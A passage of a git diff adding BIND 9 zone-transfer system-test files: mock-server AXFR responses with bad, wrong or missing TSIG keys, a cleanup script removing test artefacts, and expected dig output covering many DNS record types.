LSAnCU+Z/ +nil. 300 NS ns.nil. +nil. 300 TXT "unknown key AXFR" +a.nil. 60 A 10.0.0.61 +b.nil. 60 A 10.0.0.62 +/AXFR bad_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 5 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/unsigned b/bin/tests/system/xfer/ans5/unsigned new file mode 100644 index 0000000..3fe04db --- /dev/null +++ b/bin/tests/system/xfer/ans5/unsigned @@ -0,0 +1,11 @@ +/SOA tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +nil. 300 TXT "unsigned AXFR" +a.nil. 60 A 10.0.0.61 +b.nil. 60 A 10.0.0.62 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/wrongkey b/bin/tests/system/xfer/ans5/wrongkey new file mode 100644 index 0000000..af120b0 --- /dev/null +++ b/bin/tests/system/xfer/ans5/wrongkey @@ -0,0 +1,11 @@ +/SOA unused_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 6 300 300 604800 300 +/AXFR unused_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 6 300 300 604800 300 +/AXFR unused_key LSAnCU+Z/ +nil. 300 NS ns.nil. +nil. 300 TXT "incorrect key AXFR" +a.nil. 60 A 10.0.0.61 +b.nil. 60 A 10.0.0.62 +/AXFR unused_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 6 300 300 604800 300 diff --git a/bin/tests/system/xfer/axfr-stats.good b/bin/tests/system/xfer/axfr-stats.good new file mode 100644 index 0000000..264af09 --- /dev/null +++ b/bin/tests/system/xfer/axfr-stats.good @@ -0,0 +1,3 @@ +messages=16 +records=10003 +bytes=218227 diff --git a/bin/tests/system/xfer/clean.sh b/bin/tests/system/xfer/clean.sh new file mode 100644 index 0000000..2851553 --- /dev/null +++ b/bin/tests/system/xfer/clean.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f */ans.run +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */named.run.prev +rm -f axfr.out +rm -f dig.out.* +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock +rm -f ns1/edns-expire.db +rm -f ns1/ixfr-too-big.db ns1/ixfr-too-big.db.jnl +rm -f ns1/sec.db ns2/sec.db +rm -f ns2/example.db ns2/tsigzone.db ns2/example.db.jnl +rm -f ns2/mapped.db +rm -f ns3/example.bk ns3/xfer-stats.bk ns3/tsigzone.bk ns3/example.bk.jnl +rm -f ns3/mapped.bk +rm -f ns3/primary.bk ns3/primary.bk.jnl +rm -f ns4/*.db ns4/*.jnl +rm -f ns6/*.db ns6/*.bk ns6/*.jnl +rm -f ns7/*.db ns7/*.bk ns7/*.jnl +rm -f ns8/large.db ns8/small.db +rm -f stats.* diff --git a/bin/tests/system/xfer/dig1.good b/bin/tests/system/xfer/dig1.good new file mode 100644 index 0000000..9fa5437 --- /dev/null +++ b/bin/tests/system/xfer/dig1.good @@ -0,0 +1,178 @@ +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051952 5 5 1814400 3600 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +a01.example. 3600 IN A 0.0.0.0 +a02.example. 3600 IN A 255.255.255.255 +a601.example. 3600 IN A6 0 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +a601.example. 3600 IN A6 64 ::ffff:ffff:ffff:ffff foo. +a601.example. 3600 IN A6 127 ::1 foo. +a601.example. 3600 IN A6 128 . +aaaa01.example. 3600 IN AAAA ::1 +aaaa02.example. 3600 IN AAAA fd92:7065:b8e:ffff::5 +afsdb01.example. 3600 IN AFSDB 0 hostname.example. +afsdb02.example. 3600 IN AFSDB 65535 . +amtrelay01.example. 3600 IN AMTRELAY 0 0 0 +amtrelay02.example. 3600 IN AMTRELAY 0 1 0 +amtrelay03.example. 3600 IN AMTRELAY 0 0 1 0.0.0.0 +amtrelay04.example. 3600 IN AMTRELAY 0 0 2 :: +amtrelay05.example. 3600 IN AMTRELAY 0 0 3 example.net. +amtrelay06.example. 3600 IN AMTRELAY \# 2 0004 +apl01.example. 3600 IN APL !1:10.0.0.1/32 1:10.0.0.0/24 +apl02.example. 3600 IN APL +atma01.example. 3600 IN ATMA +61200000000 +atma02.example. 3600 IN ATMA +61200000000 +atma03.example. 3600 IN ATMA 1234567890abcdef +atma04.example. 3600 IN ATMA fedcba0987654321 +avc.example. 3600 IN AVC "foo:bar" +caa01.example. 3600 IN CAA 0 issue "ca.example.net; policy=ev" +caa02.example. 3600 IN CAA 128 tbs "Unknown" +caa03.example. 3600 IN CAA 128 tbs "" +cdnskey01.example. 3600 IN CDNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +cds01.example. 3600 IN CDS 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +cert01.example. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example. 3600 IN CNAME cname-target. +cname02.example. 3600 IN CNAME cname-target.example. +cname03.example. 3600 IN CNAME . +csync01.example. 3600 IN CSYNC 0 0 A NS AAAA +csync02.example. 3600 IN CSYNC 0 0 +dhcid01.example. 3600 IN DHCID AAIBY2/AuCccgoJbsaxcQc9TUapptP69lOjxfNuVAA2kjEA= +dhcid02.example. 3600 IN DHCID AAEBOSD+XR3Os/0LozeXVqcNc7FwCfQdWL3b/NaiUDlW2No= +dhcid03.example. 3600 IN DHCID AAABxLmlskllE0MVjd57zHcWmEH3pCQ6VytcKD//7es/deY= +dlv.example. 3600 IN DLV 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +dname01.example. 3600 IN DNAME dname-target. +dname02.example. 3600 IN DNAME dname-target.example. +dname03.example. 3600 IN DNAME . +doa01.example. 3600 IN DOA 1234567890 1234567890 1 "image/gif" R0lGODlhKAAZAOMCAGZmZgBmmf///zOZzMz//5nM/zNmmWbM/5nMzMzMzACZ/////////////////////yH5BAEKAA8ALAAAAAAoABkAAATH8IFJK5U2a4337F5ogRkpnoCJrly7PrCKyh8c3HgAhzT35MDbbtO7/IJIHbGiOiaTxVTpSVWWLqNq1UVyapNS1wd3OAxug0LhnCubcVhsxysQnOt4ATpvvzHlFzl1AwODhWeFAgRpen5/UhheAYMFdUB4SFcpGEGGdQeCAqBBLTuSk30EeXd9pEsAbKGxjHqDSE0Sp6ixN4N1BJmbc7lIhmsBich1awPAjkY1SZR8bJWrz382SGqIBQQFQd4IsUTaX+ceuudPEQA7 +doa02.example. 3600 IN DOA 0 1 2 "" aHR0cHM6Ly93d3cuaXNjLm9yZy8= +ds01.example. 3600 IN NS ns42.example. +ds01.example. 3600 IN DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ds02.example. 3600 IN NS ns43.example. +ds02.example. 3600 IN DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 +eid01.example. 3600 IN EID 1289AB +eui48.example. 3600 IN EUI48 01-23-45-67-89-ab +eui64.example. 3600 IN EUI64 01-23-45-67-89-ab-cd-ef +gid01.example. 3600 IN GID \# 1 03 +unspec01.example. 3600 IN UNSPEC \# 1 04 +gpos01.example. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example. 3600 IN GPOS "" "" "" +hinfo01.example. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example. 3600 IN HINFO "PC" "NetBSD" +hip1.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D +hip2.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D rvs.example.com. +https0.example. 3600 IN HTTPS 0 example.net. +https1.example. 3600 IN HTTPS 1 . port=60 +ipseckey01.example. 3600 IN IPSECKEY 10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey02.example. 3600 IN IPSECKEY 10 0 2 . AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey03.example. 3600 IN IPSECKEY 10 1 2 192.0.2.3 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey04.example. 3600 IN IPSECKEY 10 3 2 mygateway.example.com. AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey05.example. 3600 IN IPSECKEY 10 2 2 2001:db8:0:8002::2000:1 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +isdn01.example. 3600 IN ISDN "isdn-address" +isdn02.example. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example. 3600 IN ISDN "isdn-address" +isdn04.example. 3600 IN ISDN "isdn-address" "subaddress" +dnskey01.example. 3600 IN DNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +keydata.example. 3600 IN TYPE65533 \# 0 +keydata.example. 3600 IN TYPE65533 \# 6 010203040506 +keydata.example. 3600 IN TYPE65533 \# 18 010203040506010203040506010203040506 +kx01.example. 3600 IN KX 10 kdc.example. +kx02.example. 3600 IN KX 10 . +loc01.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +l32.example. 3600 IN L32 10 1.2.3.4 +l64.example. 3600 IN L64 10 14:4fff:ff20:ee64 +lp.example. 3600 IN LP 10 example.net. +nid.example. 3600 IN NID 10 14:4fff:ff20:ee64 +mb01.example. 3600 IN MG madname.example. +mb02.example. 3600 IN MG . +mg01.example. 3600 IN MG mgmname.example. +mg02.example. 3600 IN MG . +minfo01.example. 3600 IN MINFO rmailbx.example. emailbx.example. +minfo02.example. 3600 IN MINFO . . +mr01.example. 3600 IN MR mrname.example. +mr02.example. 3600 IN MR . +mx01.example. 3600 IN MX 10 mail.example. +mx02.example. 3600 IN MX 10 . +naptr01.example. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nimloc01.example. 3600 IN NIMLOC 1289AB +ninfo01.example. 3600 IN NINFO "foo" +ninfo02.example. 3600 IN NINFO "foo" "bar" +ninfo03.example. 3600 IN NINFO "foo" +ninfo04.example. 3600 IN NINFO "foo" "bar" +ninfo05.example. 3600 IN NINFO "foo bar" +ninfo06.example. 3600 IN NINFO "foo bar" +ninfo07.example. 3600 IN NINFO "foo bar" +ninfo08.example. 3600 IN NINFO "foo\010bar" +ninfo09.example. 3600 IN NINFO "foo\010bar" +ninfo10.example. 3600 IN NINFO "foo bar" +ninfo11.example. 3600 IN NINFO "\"foo\"" +ninfo12.example. 3600 IN NINFO "\"foo\"" +ninfo13.example. 3600 IN NINFO "foo;" +ninfo14.example. 3600 IN NINFO "foo;" +ninfo15.example. 3600 IN NINFO "bar\\;" +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +nsap-ptr01.example. 3600 IN NSAP-PTR . +nsap-ptr01.example. 3600 IN NSAP-PTR foo. +nsap01.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsec01.example. 3600 IN NSEC a.secure.nil. NS SOA MX LOC RRSIG NSEC DNSKEY +nsec02.example. 3600 IN NSEC . NSAP-PTR NSEC +nsec03.example. 3600 IN NSEC . A +nsec04.example. 3600 IN NSEC . TYPE127 +openpgpkey.example. 3600 IN OPENPGPKEY AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +ptr01.example. 3600 IN PTR example. +px01.example. 3600 IN PX 65535 foo. bar. +px02.example. 3600 IN PX 65535 . . +rkey01.example. 3600 IN RKEY 0 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +rp01.example. 3600 IN RP mbox-dname.example. txt-dname.example. +rp02.example. 3600 IN RP . . +rt01.example. 3600 IN RT 0 intermediate-host.example. +rt02.example. 3600 IN RT 65535 . +rrsig01.example. 3600 IN RRSIG NSEC 1 3 3600 20000102030405 19961211100908 2143 foo.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +spf01.example. 3600 IN SPF "v=spf1 -all" +spf02.example. 3600 IN SPF "v=spf1" " -all" +sshfp01.example. 3600 IN SSHFP 4 2 C76D8329954DA2835751E371544E963EFDA099080D6C58DD2BFD9A31 6E162C83 +sshfp02.example. 3600 IN SSHFP 1 2 BF29468C83AC58CCF8C85AB7B3BEB054ECF1E38512B8353AB36471FA 88961DCC +sink01.example. 3600 IN SINK 1 0 0 +sink02.example. 3600 IN SINK 8 0 2 l4ik +smimea.example. 3600 IN SMIMEA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +srv01.example. 3600 IN SRV 0 0 0 . +srv02.example. 3600 IN SRV 65535 65535 65535 old-slow-box.example. +svcb0.example. 3600 IN SVCB 0 example.net. +svcb1.example. 3600 IN SVCB 1 . port=60 +ta.example. 3600 IN TA 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +talink0.example. 3600 IN TALINK . talink1.example. +talink1.example. 3600 IN TALINK talink0.example. talink2.example. +talink2.example. 3600 IN TALINK talink2.example. . +tlsa.example. 3600 IN TLSA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +txt01.example. 3600 IN TXT "foo" +txt02.example. 3600 IN TXT "foo" "bar" +txt03.example. 3600 IN TXT "foo" +txt04.example. 3600 IN TXT "foo" "bar" +txt05.example. 3600 IN TXT "foo bar" +txt06.example. 3600 IN TXT "foo bar" +txt07.example. 3600 IN TXT "foo bar" +txt08.example. 3600 IN TXT "foo\010bar" +txt09.example. 3600 IN TXT "foo\010bar" +txt10.example. 3600 IN TXT "foo bar" +txt11.example. 3600 IN TXT "\"foo\"" +txt12.example. 3600 IN TXT "\"foo\"" +txt13.example. 3600 IN TXT "foo;" +txt14.example. 3600 IN TXT "foo;" +txt15.example. 3600 IN TXT "bar\\;" +uid01.example. 3600 IN UID \# 1 02 +uinfo01.example. 3600 IN UINFO \# 1 01 +uri01.example. 3600 IN URI 10 20 "https://www.isc.org/" +uri02.example. 3600 IN URI 30 40 "https://www.isc.org/HolyCowThisSureIsAVeryLongURIRecordIDontEvenKnowWhatSomeoneWouldEverWantWithSuchAThingButTheSpecificationRequiresThatWesupportItSoHereWeGoTestingItLaLaLaLaLaLaLaSeriouslyThoughWhyWouldYouEvenConsiderUsingAURIThisLongItSeemsLikeASillyIdeaButEnhWhatAreYouGonnaDo/" +uri03.example. 3600 IN URI 30 40 "" +wks01.example. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example. 3600 IN X25 "123456789" +zonemd01.example. 3600 IN ZONEMD 2019020700 1 1 C220B8A6ED5728A971902F7E3D4FD93ADEEA88B0453C2E8E8C863D46 5AB06CF34EB95B266398C98B59124FA239CB7EEB +zonemd02.example. 3600 IN ZONEMD 2019020700 1 2 08CFA1115C7B948C4163A901270395EA226A930CD2CBCF2FA9A5E6EB 85F37C8A4E114D884E66F176EAB121CB02DB7D652E0CC4827E7A3204 F166B47E5613FD27 +8f1tmio9avcom2k0frp92lgcumak0cad.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C 8FPNS2UCT7FBS643THP2B77PEQ77K6IU A NS SOA MX AAAA RRSIG DNSKEY NSEC3PARAM +kcd3juae64f9c5csl1kif1htaui7un0g.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C KD5MN2M20340DGO0BL7NTSB8JP4BSC7E +mr5ukvsk1l37btu4q7b1dfevft4hkqdk.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C MT38J6VG7S0SN5G17MCUF6IQIKFUAJ05 A AAAA RRSIG +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051952 5 5 1814400 3600 diff --git a/bin/tests/system/xfer/dig2.good b/bin/tests/system/xfer/dig2.good new file mode 100644 index 0000000..2229f9c --- /dev/null +++ b/bin/tests/system/xfer/dig2.good @@ -0,0 +1,178 @@ +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051953 5 5 1814400 3600 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +a01.example. 3600 IN A 0.0.0.1 +a02.example. 3600 IN A 255.255.255.255 +a601.example. 3600 IN A6 0 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +a601.example. 3600 IN A6 64 ::ffff:ffff:ffff:ffff foo. +a601.example. 3600 IN A6 127 ::1 foo. +a601.example. 3600 IN A6 128 . +aaaa01.example. 3600 IN AAAA ::1 +aaaa02.example. 3600 IN AAAA fd92:7065:b8e:ffff::5 +afsdb01.example. 3600 IN AFSDB 0 hostname.example. +afsdb02.example. 3600 IN AFSDB 65535 . +amtrelay01.example. 3600 IN AMTRELAY 0 0 0 +amtrelay02.example. 3600 IN AMTRELAY 0 1 0 +amtrelay03.example. 3600 IN AMTRELAY 0 0 1 0.0.0.1 +amtrelay04.example. 3600 IN AMTRELAY 0 0 2 :: +amtrelay05.example. 3600 IN AMTRELAY 0 0 3 example.net. +amtrelay06.example. 3600 IN AMTRELAY \# 2 0004 +apl01.example. 3600 IN APL !1:10.0.0.1/32 1:10.0.0.1/24 +apl02.example. 3600 IN APL +atma01.example. 3600 IN ATMA +61200000000 +atma02.example. 3600 IN ATMA +61200000000 +atma03.example. 3600 IN ATMA 1234567890abcdef +atma04.example. 3600 IN ATMA fedcba0987654321 +avc.example. 3600 IN AVC "foo:bar" +caa01.example. 3600 IN CAA 0 issue "ca.example.net; policy=ev" +caa02.example. 3600 IN CAA 128 tbs "Unknown" +caa03.example. 3600 IN CAA 128 tbs "" +cdnskey01.example. 3600 IN CDNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +cds01.example. 3600 IN CDS 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +cert01.example. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example. 3600 IN CNAME cname-target. +cname02.example. 3600 IN CNAME cname-target.example. +cname03.example. 3600 IN CNAME . +csync01.example. 3600 IN CSYNC 0 0 A NS AAAA +csync02.example. 3600 IN CSYNC 0 0 +dhcid01.example. 3600 IN DHCID AAIBY2/AuCccgoJbsaxcQc9TUapptP69lOjxfNuVAA2kjEA= +dhcid02.example. 3600 IN DHCID AAEBOSD+XR3Os/0LozeXVqcNc7FwCfQdWL3b/NaiUDlW2No= +dhcid03.example. 3600 IN DHCID AAABxLmlskllE0MVjd57zHcWmEH3pCQ6VytcKD//7es/deY= +dlv.example. 3600 IN DLV 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +dname01.example. 3600 IN DNAME dname-target. +dname02.example. 3600 IN DNAME dname-target.example. +dname03.example. 3600 IN DNAME . +doa01.example. 3600 IN DOA 1234567890 1234567890 1 "image/gif" R0lGODlhKAAZAOMCAGZmZgBmmf///zOZzMz//5nM/zNmmWbM/5nMzMzMzACZ/////////////////////yH5BAEKAA8ALAAAAAAoABkAAATH8IFJK5U2a4337F5ogRkpnoCJrly7PrCKyh8c3HgAhzT35MDbbtO7/IJIHbGiOiaTxVTpSVWWLqNq1UVyapNS1wd3OAxug0LhnCubcVhsxysQnOt4ATpvvzHlFzl1AwODhWeFAgRpen5/UhheAYMFdUB4SFcpGEGGdQeCAqBBLTuSk30EeXd9pEsAbKGxjHqDSE0Sp6ixN4N1BJmbc7lIhmsBich1awPAjkY1SZR8bJWrz382SGqIBQQFQd4IsUTaX+ceuudPEQA7 +doa02.example. 3600 IN DOA 0 1 2 "" aHR0cHM6Ly93d3cuaXNjLm9yZy8= +ds01.example. 3600 IN NS ns42.example. +ds01.example. 3600 IN DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ds02.example. 3600 IN NS ns43.example. +ds02.example. 3600 IN DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 +eid01.example. 3600 IN EID 1289AB +eui48.example. 3600 IN EUI48 01-23-45-67-89-ab +eui64.example. 3600 IN EUI64 01-23-45-67-89-ab-cd-ef +gid01.example. 3600 IN GID \# 1 03 +unspec01.example. 3600 IN UNSPEC \# 1 04 +gpos01.example. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example. 3600 IN GPOS "" "" "" +hinfo01.example. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example. 3600 IN HINFO "PC" "NetBSD" +ipseckey01.example. 3600 IN IPSECKEY 10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey02.example. 3600 IN IPSECKEY 10 0 2 . AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey03.example. 3600 IN IPSECKEY 10 1 2 192.0.2.3 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey04.example. 3600 IN IPSECKEY 10 3 2 mygateway.example.com. AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey05.example. 3600 IN IPSECKEY 10 2 2 2001:db8:0:8002::2000:1 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +isdn01.example. 3600 IN ISDN "isdn-address" +isdn02.example. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example. 3600 IN ISDN "isdn-address" +isdn04.example. 3600 IN ISDN "isdn-address" "subaddress" +hip1.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D +hip2.example. 3600 IN HIP 2 200100107B1A74DF365639CC39F1D578 AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D rvs.example.com. +dnskey01.example. 3600 IN DNSKEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +https0.example. 3600 IN HTTPS 0 example.net. +https1.example. 3600 IN HTTPS 1 . port=60 +keydata.example. 3600 IN TYPE65533 \# 0 +keydata.example. 3600 IN TYPE65533 \# 6 010203040506 +keydata.example. 3600 IN TYPE65533 \# 18 010203040506010203040506010203040506 +kx01.example. 3600 IN KX 10 kdc.example. +kx02.example. 3600 IN KX 10 . +loc01.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +l32.example. 3600 IN L32 10 1.2.3.4 +l64.example. 3600 IN L64 10 14:4fff:ff20:ee64 +lp.example. 3600 IN LP 10 example.net. +nid.example. 3600 IN NID 10 14:4fff:ff20:ee64 +mb01.example. 3600 IN MG madname.example. +mb02.example. 3600 IN MG . +mg01.example. 3600 IN MG mgmname.example. +mg02.example. 3600 IN MG . +minfo01.example. 3600 IN MINFO rmailbx.example. emailbx.example. +minfo02.example. 3600 IN MINFO . . +mr01.example. 3600 IN MR mrname.example. +mr02.example. 3600 IN MR . +mx01.example. 3600 IN MX 10 mail.example. +mx02.example. 3600 IN MX 10 . +naptr01.example. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nimloc01.example. 3600 IN NIMLOC 1289AB +ninfo01.example. 3600 IN NINFO "foo" +ninfo02.example. 3600 IN NINFO "foo" "bar" +ninfo03.example. 3600 IN NINFO "foo" +ninfo04.example. 3600 IN NINFO "foo" "bar" +ninfo05.example. 3600 IN NINFO "foo bar" +ninfo06.example. 3600 IN NINFO "foo bar" +ninfo07.example. 3600 IN NINFO "foo bar" +ninfo08.example. 3600 IN NINFO "foo\010bar" +ninfo09.example. 3600 IN NINFO "foo\010bar" +ninfo10.example. 3600 IN NINFO "foo bar" +ninfo11.example. 3600 IN NINFO "\"foo\"" +ninfo12.example. 3600 IN NINFO "\"foo\"" +ninfo13.example. 3600 IN NINFO "foo;" +ninfo14.example. 3600 IN NINFO "foo;" +ninfo15.example. 3600 IN NINFO "bar\\;" +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +nsap-ptr01.example. 3600 IN NSAP-PTR . +nsap-ptr01.example. 3600 IN NSAP-PTR foo. +nsap01.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsec01.example. 3600 IN NSEC a.secure.nil. NS SOA MX LOC RRSIG NSEC DNSKEY +nsec02.example. 3600 IN NSEC . NSAP-PTR NSEC +nsec03.example. 3600 IN NSEC . A +nsec04.example. 3600 IN NSEC . TYPE127 +openpgpkey.example. 3600 IN OPENPGPKEY AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +ptr01.example. 3600 IN PTR example. +px01.example. 3600 IN PX 65535 foo. bar. +px02.example. 3600 IN PX 65535 . . +rkey01.example. 3600 IN RKEY 0 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +rp01.example. 3600 IN RP mbox-dname.example. txt-dname.example. +rp02.example. 3600 IN RP . . +rt01.example. 3600 IN RT 0 intermediate-host.example. +rt02.example. 3600 IN RT 65535 . +rrsig01.example. 3600 IN RRSIG NSEC 1 3 3600 20000102030405 19961211100908 2143 foo.nil. 